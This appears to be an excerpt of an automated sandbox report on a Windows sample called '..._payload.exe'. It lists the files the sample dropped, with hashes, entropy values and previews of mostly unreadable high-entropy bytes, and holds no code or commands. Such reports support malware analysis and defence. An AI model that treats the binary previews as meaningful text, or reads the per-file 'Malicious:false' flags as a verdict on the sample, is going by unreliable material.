                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):350
                                                                                                Entropy (8bit):7.29034120351369
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:QIlJWXdDIrFq/uDKhtYbWAZlYDr98ciWMd4L7zXu7TwBCrsC8dS2JOWc3cii96Z:QA2dDSrDKhm3TYDKcDMA7zXO8BCrsC8I
                                                                                                MD5:A1DA0020562BF55DA371387F9385D63F
                                                                                                SHA1:2E6873C2D7309D751014730A511972973ADC7113
                                                                                                SHA-256:4854B63FBD56A4A2E79163129878398360F836FE66B5A6169B71758ECFF6F6B6
                                                                                                SHA-512:C71CA981C417923288D6E41AEAE5EF87E06F6880E9D97075A54B4F854771F78CE4D762F99C4C132759208CFFD011FE31EE0095D36B71167F7E1D3C53C7052986
                                                                                                Malicious:false
                                                                                                Preview:..j.o'...T...~.(..sl.a..Z.....R..U..kO...m..(..?.. .S1.X...#.\<..lAt"..^]6..n?..,!..uh..f........8......%?T+..cB.&I.,.....1.PU<pZ.ZsG...@.p....\%.K...V......5..[8....v.mVW..M.S.7.F..%......M..zM.....=.o*.V....{..^a7....F..R.a..8.I.2.....j.....[,....g.5O.u.?.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1352
                                                                                                Entropy (8bit):7.8499322890951255
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RvqUF4FxPwFNGdB+mycOe3A6R2Av92QhxE77I/omDWYlEx3bD:RvAxPgGdB+SPvcsXhxE3Yoi8LD
                                                                                                MD5:7669AAF59291633B441BF82EEA3EF311
                                                                                                SHA1:3291BDF3BD5671295DEC54223ACE9AF253766CF0
                                                                                                SHA-256:3BBB574B7CB1DE120F7D8A2F8A1FBC664A7F01FC3348BEC2ACB17439225D7108
                                                                                                SHA-512:2708DC58C5010AEAB9E120C7790FE4D859C1AF315618FDCFB5AD2B8295DEB50255E7257FBB4138A7ECC5FAD374FDD93B32B713783607F42759A43EE645C9D3B3
                                                                                                Malicious:false
                                                                                                Preview:<?xml..E.<.+..^Yv..F...../+..9;.XE.......p:...N8...MY.....`.D..B.....1......bI+$.b_).f|2Z..#....)..9.. ........h.2`.D....._2.t".lk.....d.J.'"...BL.K.U2.`nP...JJ..b....v.uF..c.9......r..K?..#........:.....K.fS..s0KI<n..I...\.Q6......x...?.E..8......k.t&.[K../=)*.Hs...#......&.R.....l....&Fm./..D..?.p.M.oP...%..}$.\.#.+i.Q..9U....[.iU.....7^.....l.....*.........&O.J....[-...-..e&.W...........}.....\.8KC..0P..p.d....s....O...e.....d...L.c.......=..pP.".P...m.wi...x.pc .......U<...r.....|I...Bzc(..g..n..V...&\....'1T.8...(M.X...)5....\.8=..N...r,..9.L....*...7..]\`...`.......'6..w{-L-#..L......K?...K....F..8..D....9.F..].).,..eZ.fI.6.a.........>...s....$.&..j..|.1.V(.(d"vWz...].>....,.S...]1..rv...Y.MOub........).6...|......O;>.n....<.B....z`.....m....E...1....V....@.}..h?.h....(.vL...l..3..../{..p......O.t....%.ft..N..eTl...q.f..7.....4...=I.y.yc.......SZ.."X.....4j^b.o.#..e.Rx.q.. b.7..r./I._..[.e>Jo..??....6...\PV^....z.i0...x.z...~S+
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2424
                                                                                                Entropy (8bit):7.918489327356293
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:3102Cp0g/P07EsPAJIvSduQgh/rO7cWhIOPZpUL8MX1FDym87EOLD:lr69kEsoJIvScO8qvULlX1sm87x
                                                                                                MD5:6FE73D1488F5AAABF52A813746DB58A4
                                                                                                SHA1:0D462AC4B9E8702EFEE443BBFE669DF6627E6A90
                                                                                                SHA-256:6E18F13E1C3F30C488333AD06FA0A19F9BF11AC4F6604B02E16D308B55AC959D
                                                                                                SHA-512:ECD51EFA82206EC89E7856A24A3178CBA85ECA5ADF8E4760E99E80DA197872B523524169575BAE795356844410455127188AD94A614B2B90BD9FC3366C015117
                                                                                                Malicious:false
                                                                                                Preview:<?xml J........a-9.-p3._..r......(.O{I.n......5...u....!..W..QE[g..m..8c..Q~KH..c..}P..../.T.?..8....+1...,.X..M.a.4.!..P.J..,...d....n:B...v.~..e'...y.."V1V.<.QJ.,.......i....o1....X>....Ten...~U.....(..=N.]!..h#.......r..U.QQ.....R.......p.V=.....k;.xq.f.D..A-,..K..Y.....Q...j...F;,...".M.A%`,..|.....a.....*f\...j.J.LeN.".>...%j@.I7.x2.R.g>.T.^../......s ...6.N.$@.:/m{.....hy;./..h.\X...Vgz=..g..&.sm.SLo.yr7x.&.L.....e....@J...k..{ .a.'.k.....,.7..bx..ZiA|.q...<....R.....are...3.(B.S.M.FQ....&..X.*.M5&.~y6E.........*..e2.a......6.."..n...T.a.....C..Ty(...%..f?.....e.pjQ..{P.v....rO.RC.]a....[...Z.Ku.V..M[k5kc...3....^.....E.f7..j..5c....U./..n.....3..}.\4.(...l~.1t. ....,...P....S..Z...F..$..b.#.....J`\..lJk..*.f ..zA......s../.@w......Q.:)...{..O.Q....^.y..sh:.z..m...f.E.P.....v6...S.E....$...vQ.....Fuj..I.O.U.+.$[i>...X...L...^x..;[Y.Z.......<.L.t.....b.....o...cw..O...C..h...7y#@.86........"6..p|..yw\.MP....5..K...i.Fv.RM....A./..xX
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2381
                                                                                                Entropy (8bit):7.914361507818911
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:P5QNhy/oKLsLxDzUXXyIRJOBuOnr+JMmgcaF9ozpSOWMo6LD:PiNzKoNzAfJOAOnyjY4YOWfa
                                                                                                MD5:21FA443B7D36C251B273EFED98618515
                                                                                                SHA1:591F668871643B7716DE4BB63D89FA76AD67AF04
                                                                                                SHA-256:948C2F272300BB5E33B6FA9F74E6A580FFAD4E27F4B4D027C3C201A22609E5BB
                                                                                                SHA-512:2FCB296EEA18338D848BE5E7089B48A5AB756ED2A1EBC6459D6EE8EB56F377001F76C98F841315BE42B0976139E884E69E239419EC7041A0C955C3EB4B787E88
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....5..K....|{$..3y...%.J0o..2.....E..(e.a..zm.Dfei.......7.$.@IP.)..V.S.......N...`.C..0.O74..Q.;:.....\...#........S..x}...cl.d,...$...)1.J.?;../../H..........b...w..J....a...(Q4G.5..... .I..E...h.L.%...e..-...M.../aM5.$.`i.....Rs.D;.......W...=...H...Q..=....B....|....W...9....%...pO.....A&...R...|..6.....?.v.b.q.j.7 . V...`.!...FW.?.W..s.mV.O ...D....=J;.......c...r..H...w{.UM.f...s.Tr..~..arL.f[..,.0,Y.J....y#c....L.@..@..0./d......;P..U.e........ES$.j.....tH-....]..J.0.{yT.....t...]..r~.>.......j"...E.F.K&...A..N.Q....9I2.Q/.m`..\..>..NW......t..D9...........p(.Y6...a_h9.I.m..I...K.............&.4..._......*..|......h..R.q$f..]...%C.(.6.4..P...`.;A&.*/^.&&L.)./.K.E.J...e^$....G.:.|...Z.R.p.....E{+b^....6...[......XW*@ ......{..224.e.[=..&.....I.JM.Ji.:_-)....7#c.3..FY.Mv....Ba....7.Ei..Y..l............N.6.|.'E...;\....%.k..{.`....WAe.&...X.(.Zo/......N...]5.L_...xZ:.k.3...e.2 /8.%...f..]s=5....o|./...v.I_..W...~...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2398
                                                                                                Entropy (8bit):7.91230206137605
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:4+UTOgHZ5WhfgDbI+J7yOD9tkNkM4E0qDxCFTtZLDhNwEilgLD:lgHGgNJGaM4E06eLdgG
                                                                                                MD5:7AFC62BB1A2CD0D1230044F48BC193B6
                                                                                                SHA1:99415EB03148F6F89D40F15A57783D7BE91A1749
                                                                                                SHA-256:CDE7FE9D554AE5F6BB1AB4031BCBA165EB233F178DDDECE54576025260E7C41E
                                                                                                SHA-512:14CE5788243D5A2C775189D15121129996069215BC006859DF05FBE9175678BC01306688E2E8E64731B66D88FF5DC55DA1790AEB2D37B552D585A9A3B12C90C9
                                                                                                Malicious:false
                                                                                                Preview:<?xml2<>(..G.....N0..%~.....,.d.....?....KuPg.PN.a.55......P.../.[.Gu.%.......k;L.e..<.s.0.....I.31.Y.._#,..9...I...6iA..A.B.x..TL.:..iK..+.cU4V.>.}..A.*\:..(.P.v.ZO..Hi........1r.7...4....oZ..5".|.......).T...t$....d..6.r/..D...(..J.]q]......A.8HG.......u...q9N..6.bY...s_..L.U..[u.....:.n..p...)..E.#..G.9...jZ^.G., ....}q+=.........U.X...%.p...!.J...b7&..g...U..Y6.U..!.r.._p../7.x....[...~...>..]......r.I...;.......qVM..W>...Z.<~P!.Y...9...JH.?.Y.z.h.m..T...dX..V. ...5.r{h..u....=...P.......%JD.r.RU.6Nl.S)...."7..)..'.........@I.q...v....]...G....B.t...?Y.^..4EnH+..?.p~.v.b.......-........).cPkb..&....q..s0..{M.S..qCb......=.....|..........o8<LG....#.......'.......g.S-/..O..Qg..$V....J.Z..\x.0h.5.k*.k.-.V}z.Y...p..I(!E2..5JlT..q...h."..&.:N.4...=.._.!.^=..........J>O...>a@..?8.....N....V;.C..e..e.Z....^.."z.3.h..+E.]...)5".S...1{<..B..HI....-..4..p@..L.e.0D..X..K..\..<g...O.R.rF..C...8.g:peA.1D...C.]].11j.d...G.F.T.!.N..0...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1358
                                                                                                Entropy (8bit):7.847474643341586
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:iJ1jrGDungvo0F8buzxt6oCPtOBPcE/qRbyFhbzu/iHZCmAVDTmVx3bD:61XOo0ObexJ4im2FhKBZALD
                                                                                                MD5:DE7BE530A69C696AE04F747F0DA93EC4
                                                                                                SHA1:C0FE93D81E786DBB205A70964274D9E4F090738B
                                                                                                SHA-256:31F09A2C42BF4112B5956F979EF660BD630203F0CCB732DFD937217780D4BE6D
                                                                                                SHA-512:44458E7240367B6B71277E8C7B6ACFA6A22D50C7C0C8729AD331A6E29A737A1BFDD9024F95CFB4499FA2A6D5774B76E985152DA492A7605A2F5F96E9C6D466AE
                                                                                                Malicious:false
                                                                                                Preview:<?xmlV.<#O/j..6...s.. .. .......PRz.g.8H.LD;....}....,..d..6...W?X.....;.N..}Jg6..=.E..<.....f.UV.C...+u........N.2...w.;.ts.%.......@h$c.j.#.0l..*>.n..W.kJ..=..P..fI@...W...W.....X..."..U!..0.r...Y...+.Z..5.....Q.8:.9(..E.a".@..G..)..;..=.......&Kw...V.d...z...k.H.As.}....i....@Q...u....|Hp...c..r......n.$..R.4O6...1..q.."..Z4....}S)..u^2..i<x.\i.CD..>........z..||CG..*b..] 5.H...".hh..AN..7...#.#.H..$#.P6.2rH...8.....).....f..8...Sw>.fv..<......L.Db N.a...>.T... .<...h.D.n..pn..).....L...f;..=3.f.)<E.\#....!......u_.q<.s\_]....b.;.p.../...$C.......9.%...~9...*.2...........S.@-K...k..n..O./o.OJivl..3q......)..G.3...Y./...........C.M.X.x[..;...K..L.u..>.zj.[t...R......;k.=mL# .z."TRu.*.l........t...)..U)Lgl..p...r8.^}...y.{,9....|1I....O.!.S..0U.Z.8..>&5...&V..`.].pI...4.8....V.....0A.0u...U-..2..x..Xp..p}f.~.Bc(...........w.kE...k.Q.h....U..uL....GZ...6,.q..e.c.....?.=.cm7....Y.5..J.J.CN..p.TYX...50.aB.......0.T.na.<..DFCj... .v..u....*:...2...E
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2409
                                                                                                Entropy (8bit):7.904577721403783
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:RkpqQdltyXuq2fPk00NAOSTJSq20e1z7WjhXLDDzg88zXLD:CcQd9qV0Kr+Sq2uVbMb3
                                                                                                MD5:D5A54BA1D88C0440699A491D159D451C
                                                                                                SHA1:D69FAD079F85A2C6E9E23ADC040C29289CC67010
                                                                                                SHA-256:968105ABD3525C16080E157D9EFB642E2580931534A9499F69DFA342EE1D14B7
                                                                                                SHA-512:2E9D96CB7394F8FE102A6838F762D398B3B513254E153CF033D8EA65C3E74844B000939EF67324EC8AFAB396D4ABD1411A72E5B9171DA0D115F9F99E8A6FA9FD
                                                                                                Malicious:false
                                                                                                Preview:<?xmlD..K.....\..(w@}H/.<X...uJ{..[..&..G].b'....&:=.....s%..H.v`.3.'.....q....i#.Vw.=F.m ,....M...L...?.S..|3....#y.1..;s#.....Z.iOM.m.....%...^.....K..lr.....j7...z.{]........].z6.'...!.....f...F$.......n.3^.8c....*g.C..>^...s.'2...5..C7.^...K..s..T0_1...m....u......o....L.<.O.]..)i..D..xyW.P.dtp...."..Y..8..;M.TB.Zn...cX.d..4;%r.,....]]DA......L...........6......J.V.Y.mu.E:T....-....t....;.....v.]...B...vw..w.c.=M.O.9.n...Y.. 9.eb.w.h~.<...M.P....vx[zx.X.je..m...b....5.:..A.u..S........4=f.....,.....7.>.....D..U4$.+..yb!..<.\...l..[.]..0. .=..V.M..6."...{W^.+.64K......{.q.O.O\...Jk.J....x......x.Q...L..W0F.hJ.9...J...Ak...R ...6V\..`+.8..{z..~AY-.su.....Z}..^<l.:.....7. r..w....(b8a..?.4a...k.HL.*H..x7...].0...*...v........d..]..@:.?........H.9.!.....=.N.w@[..'.Ha.f....R.T..i=...V.k.".^..JW.+.X..17(..!...|f,Gf.Y.i\...r...-Y....M.o......M...U#....4BT.A.@.z.ik...p.....$.....$..5..2.9jv.xNNKYP.^.1W...r..j.4..DAs).I...T....K..*...q...M+G.l.J<{....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.863516957526952
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:6+n+hHZoM3nE2/bloqPFC5sCZg1HRqnE0/Ekw01kMgdA8Mx3bD:Jn+93nE6ps5r8H0n/Jn1ySLD
                                                                                                MD5:6932FCC1B4A508C2C1B2F936CBB4AFB8
                                                                                                SHA1:3772B3EFABF002E5B1FF806671F947AFFBF03023
                                                                                                SHA-256:6C787FE2A126E35E4408662671B7C50ECF72849185DB63A4BFE3A2BB53B38A5D
                                                                                                SHA-512:A5A42B0BF47D8CA122E17E1F9A09244FC7787492B09114B95BB6CEE482DAC81550925AB98FC4A5C48CDE76A74C768E314F2BC1998ACAB6978862C46D8219650D
                                                                                                Malicious:false
                                                                                                Preview:BQJUW.._.^MV..f4.|L!..^..0P..........\......E..M.....^.....~...]...H_..1.}Ax...u.[vN]5.......#..C....k'u........S.+......?._.!... .d..z..X....}g...8C. .sG....-.P.r.....E..>.F./....ow../K...?|.....;Xw..jP....Coi.......:..*.Z..7(Q.(.......k.......... .U'....Tf&. ..[bA.......g......eo0.u.n...p.S..=..>...p.g.?....z..3.t.+Uh$_;:.s.......F...t.[.c...a..Kv?8...#.f).&'.......%....*....a..w.h.F.....){%.....Sp..8.n 8.x....\...4..Y......l.....T.V[...Z......{............N..0N.9A.:R..a=....>y...6..;.....A..}..`q..6w,.MB.......N.>..'_K[...Iu. c$..........?FWV.....SYO.}....Rf;.7.....}4.g.{.e...-..[..F^.@\...,..!...#j.O'..Q.{H-..wR.r..S...G......N...T'rn.....nh[......W....{.{...Wp..Q.p.N.Z6...<w.lc.^F1..O/.an.&.wn....v|8....v...,..m.q}..~.L.6.f.jm{D.3.....e.Q..z.S.a.8..W...8....8c...c.G.C....0..,..E[e...1.f.U}.. .z%.v..f]..<...U...s`.+......T........)g.....;...u..3...0...M...g..>....a.O...Y.?xHBk...P.B.b......*..*.~)..9.h..y5.`"$..d_...8.A.j.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.815036721438697
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:D4n1yNQ0C7lRWuyhb4Eo6hQuRUbkczYwlqbKg3A0I/K7PJNUFUIhakly7oTsoi6g:Ds1yZCfib86hXYPc2fcJvIZPTsYuMArn
                                                                                                MD5:78F2F1249B0CE0ABF23389601C28150C
                                                                                                SHA1:36C7E4D51A8477ED841BA8958CEC0A4C287E295C
                                                                                                SHA-256:38BA2189840143B554223B89849AFCCA64512E81DC88FEFDEFB6759018BE8645
                                                                                                SHA-512:B88CD94A250F3799782095B3FE581A05DB5E69470B87064A0AF729CF0E6793460D8F90E5B5E14C7C99A9F6F9DCE4E1BB2907D8DADBBB27A2A45A5FA91DE250D2
                                                                                                Malicious:false
                                                                                                Preview:BQJUW..~....r/./.M6Oa.b..i.YC.......S.i..i...L>....[......;.Ci.G..|.K..n..R..f....^. $*)C.D...(..E....y....E.......y...~`N..G...U.R...8%..%...-..P.*T..c.a.-.g.[..x...Y.....,w..X.!.N.V..>MR......voBVJ..%.#...(.*.x......2..P.u.PJ..Q.*m....wKc....9@....tI....#.0j.]YU.?]....-)f.ck..{.....yo.+.9p.yG6.P....rn.. ZXqYJ(....m.*@.[k.W.v.....{.H<........>.X.X.).$0Qu[...W.7....JLfe..=v..........&A!C2.X?I.M.>Jo..>..Y..L.....Z..5....=Z40.0..3.<3\4........h+..1(N.U...Ob_,....s...v.&.1=S@.../.[.X.4...L.I..}.W.........hwHW.'h.:=..7..[.#*Ef.#.GF.j]`g.M>..Z.J..<...<>.....G0..(Y.=.;c...s.Z..-~2.c.Q...i3.....g..e~R1N.)Lr9......GY.."./@r$...........Q.CX.kzok.5.C...GA.q..j.wT6tv.c.....WD.=H.?..q.`(L..W....Z.f$/W${.8.[.0!....#".%...m....k(..5*.M...d...........8.1..h..<.......8e%6....7...-.$z.z...J...j).......WvoD. b.#..p.|V....]~..F~.C............9.i...iM. w.5...E.1.M......S..?......u0.=..f.2..;....*.|...[V...}......nr.:....I;...n...o.#..P[...B....h.C..+,N#.H%3.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.850873254155832
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:mNqVGXVj9FZ+KF9KCINojR4u35oSeHftYeFxCP8h9wvn1R6x3bD:mNNFd9K2V4PDfKeF/jwvn1wLD
                                                                                                MD5:FCF946A55581013DC6968D68DC1B8003
                                                                                                SHA1:E2DBE84CFD532671AD2A8A31034974A2272265BF
                                                                                                SHA-256:FB6C964137EDB0843ED45646B32373D4EE40682318954F4ACCCCA064419AC58B
                                                                                                SHA-512:8A96387F84744E1082DFD931F3F426D295E70A82A1D2048BD9A6B2D41C028E72764A3ACCA12B76F4A1EFDC1FFB6E3D80DC052A45DACCFDE0DC57075DE15D6C14
                                                                                                Malicious:false
                                                                                                Preview:CURQN`@..-.....,.../...u.w..:..4.....GF...jvK....S.....~..'A......9...2.......~....4....h^.Y...,......RBP..$...ff-....0.Y.gI..*k.....R.A-.,...}6.q.?w.<(..ik......c.E..I...<.p.7.e._H.3.?...W...5......N.V].d.pT......]K..>e]O...%(.........PmRJ}.......#;.P:^*.L.>O.....&..e.....F..7...Ks...f&'../cd.O.].Dn.a....~.....EM..G..r.wx.By..dBk.......].zlV*..tf{i4.E..:..&.!H......L.m".cM..9<...o.R.B+..8.UI....agnF....B. %..{...g..........].(N.C......Od.)w2....^t.L#.gC.S...I..7'..P.[..hy.>..1....|l+...x..YM....)......E..2..78.."..5'.B{z..,!.N.j~..:.f...r..0}.=%bU....e...u...a.i9H.7....*'..{...`\:.I..\....hx..b....9[.Uo::w....'..].vH.GNW......*e..u....%.........xfc...$..c|%m..^+....n..h..'.8..........$vU.j..T7.M.c+..|...r../....#.......'._P..b../w.D.......e?..p...8%......~.R.........?...7.yZ....b4.u...-..0.V.(.|.v....8x}~....0jF1...\is.....6.{.x.I.... J.4.<F...+..B..D..'-.z.]d..v.....e..F....Y.y..G.}P.L....Jr..D...........-....*.e.he.0..P...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.83636572063028
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bksUoRqAul9GOVHT3GhC7DCHOdtR3XzCLEYrhJgSPgH2orUx3bD:4/FHT3f7eKthXzCL0SYJwLD
                                                                                                MD5:01552340125819581E3C315AC2E7E6F7
                                                                                                SHA1:FBAC5767C775E3351DE45FEF6999485CD3A9BE52
                                                                                                SHA-256:DBE36E731E6872BEE02345176AB7DBE2325DA7614BA5D5A4D2075D470A20ABFC
                                                                                                SHA-512:B1BEF18A71E28F36C225A8FACE3389DDE62033382C3FA77454E6A679BB10FC226EF1EE186CA8252A441EC1FDE3795C86EA66C86433265FBB0C8E5863A7AC2DFB
                                                                                                Malicious:false
                                                                                                Preview:DVWHKG.R.....\..Z.lq.e.j.Wz..v....GFm#.A..g7..6<.l.@..y...x..6.v...X.h..."{.j.q\..P..[...^"......[$..0t.r.....g.v.gI`......Yw....bt.1...h.A....1#.W.9.Z....~....7.Q..b6[.Y..N.i.4H.v..5.=.c...........m.A........&.3gb....h.,b..ZNb..1....O'`.p.[<YJ.........z...y..f.L>&g$.Y2......g........:.}t .2..A....].B.Q.z`..._.0.....A..K...F...w|!2}S.r.9.....^..1u...aO.L...n.!..=..p.&...u.1u..DIV....&..4.-P.T.O..J"u.V._ic.V..Iw.6..i.9g.i......4....#.....9.\O....0^..A.+yG..[.!(...@C4O..xM..'Y......4.....VO3..d[.&)......3...x...j,Krg.~9..!.!04CU]...2V Pw;H\l...:q/R......Y...n.#..d.....)fS....6....-8,.R.O......t].$...8}....F.i...M...Z......{..u.#3...n....X.}.`...k..t...z...=.P...O......}......2"\..-y....(.<_M..`.A.H....DR...S[3...!i>7&`.=.5l%J4....q....X......d4;...Y.Lz.L.@........l(l".;z..4P.u...U1J..J.k.P...8......N.......}E[.k...@> q..d.H.-.F...d..m...~....b...0.u..z..4Qx...O.....[..^.e.c.,..x.:K\.t....=......E%.l..Q..........c..k.o.~i).....Q.yO.....^.H..4....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.839325898276127
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:G5GMHA6hcCRETfO0Yo85x9AttDxv912AweESTBnjr53+mDyWPYex3bD:G5blWG0385nAttDl98Alfjr53VRLD
                                                                                                MD5:C615044AAB7650B90342CCE3A06C7ABE
                                                                                                SHA1:F4AAFF139D413E62E7DAB9BA998A30D8FFD0B12D
                                                                                                SHA-256:C77F1C567495943CD73E4868BF579788BC0F19AE565798A1942E276CA8CC030A
                                                                                                SHA-512:18A749D5C889C7DFEF2E91B211F5F9BE4D14127BCF436AC07AE1C7697E501514B4EC32AA82DECBB7A5A0E55A615CC8110AC794065C8886235C652AA6ADAFCA43
                                                                                                Malicious:false
                                                                                                Preview:DVWHK...FBCO.....$6..08..u.-..6..t..?9...Pp#`.o....y..E;...L|`U....!|.v}..%BO.../..4.J.N<...6p.#h.........ig;.9..^..]]..W.-.t.]Vi.%?..?)..!....:.Y..9...1E<>.d.rvL...6+.W.....e...'..Q"..........TC.....$..z.......l]T.Q.G..z.*h..|.....U..!M.c.....W..b...^.<.@.6....f.....=;i...C.J"..{}..4...Xbcx'.....?G.L.....Sd^...C(L{|d...O.)]h}Y...F.%6R.v.b'.."..4../&.uO.L.E.....%w.6.,..........>...J.....g....S.O"..bA.j....5z.Z......l..1..O..!.3.Tj.A.NY....~..0.:..|q...vJ\v.:...I....n..Q!A..r'5.E...@B........L.G.G.l.../..$.C.$.c...g....M..-..^\].&.......y...r..e.U.0.C..Cy\.(.b.)v.s..`..L4.V<....Z}..9.b.nf.c.A6:.Z.q.gB/...XYI/.#.Kg4...>..G.k.fM..B.26u.-...6...i@..|r...Jl...r.Yu...;(....7tR..=.!.....v....G...i.I.l...tX..H: ..S...6TM.CV..U..b.........:O.1..o2A[.....r.g....#..a.K2d&.k.n..,'*yv..z..B"9./..f'^..6A...H>........oc....V?,.......++....5Y.aSz...^.v....T;"..5h.I..b...vX6M.E.V...BQ.w...~eftrg.~.@....t.M..^..,0..s.v.p....9......X.s...]..qD
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.862309030520784
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:HTlqRe1Lygs+iDD0sBJ/ZbLffZO9xJYbekIKZhnU1DUnjS5Sx3bD:zwGLNKDTJpLc9xe3DZhgDOjS5mLD
                                                                                                MD5:DD74478450768C7B703E4A8D5348501B
                                                                                                SHA1:00387BA01CF59126B7E58FEEA4595DD9B94C6C94
                                                                                                SHA-256:E13892FD9A3CBD20C71E4D9BE08ED284B03FC3C0B1CD797E5AB7D67AC007FBC8
                                                                                                SHA-512:B9AE2EBBFE762D6EAB1E7263F7AEDFFF4185AC5B4D33FA8D80D9892D68B95134AE1F4172A501C9D502CA2647A6987452092ECCCDF5FD141834F7DC203D4FF612
                                                                                                Malicious:false
                                                                                                Preview:DVWHK`.C.O.O.....!..z........p..[......}...gk(.E....)...l.f...|:..0C.S./........yM..;.a.<.&.k...a:...w..~.......f)..W...!%{..?......;...D..J..)/[M.%....%e_....O....../....M$.#......t..^.._..[tN...k....2T......!....H.....".G..k...C.a..69..>.O1....V...*..../V....9s.o.V..N.F[..c ....|...@..n...l#...6.]..c3.P.7G...F.M...N..EJ......7.........T.<Xf$.X4.|.<.... .T..>..n..b.i..]....Zu..J...1.i..].F...(.pQ.....K{.8.=/.K....7;M..c~......Pq..!.@....%...M....'..r..`.....@ z.BW6..G1|J.d....G.m6..B'.v.>...."..[.IJ.a.?..1.......k....t....d-...l?1.,T<.....*$.J..T.^{O.4'..o3Y.5bw.....#Q~..XGug...$_QM.q.._.M..c.Q.{.v.~.;.m..=_....x....Yl!..&-.8..h.h.c...Q.Fn....K...M..U>..ph.....+S.T.z../}.t%.{o+..c..%hr"......K.....[..v.Z....^...K.=.....b.Lt.........[<2..5o..Tdf".9Cx~../.F...{...2.`R.Vl^.QpcV.5..%ho.j!e.T....M.t]..3)v/!......P9..e....^..{...F...?&.9..O.....l..wh...w.....%O....|v.)X..*..0p,....E..)zqYf../........R.8/.Z!....+..Q.>@`D...../Q.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.828470057815473
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:q/fWicRzkxr4udL8whTu288j3HPYz3MQwsGCu8IpMkkx3bD:+fY4Gcdu288jXPmjwsGCu8pLD
                                                                                                MD5:66BB7E21DCDBA4AA8B402FB1AB4E9739
                                                                                                SHA1:2D0421C398388833EDB486CB1DA6CFC4252D7800
                                                                                                SHA-256:11128282830204E3C327EDB750E37E3C93F66B757E19D28255200A4C8894C639
                                                                                                SHA-512:76F8B254FEAA0F540F1A237F901F79711069B62F39B5D5C58BC3ADC2FE44046E90D2EA7022A2281BA1FC326CAA2895CD3B1DF383BCA6A6733F59DD2C8BCB9C85
                                                                                                Malicious:false
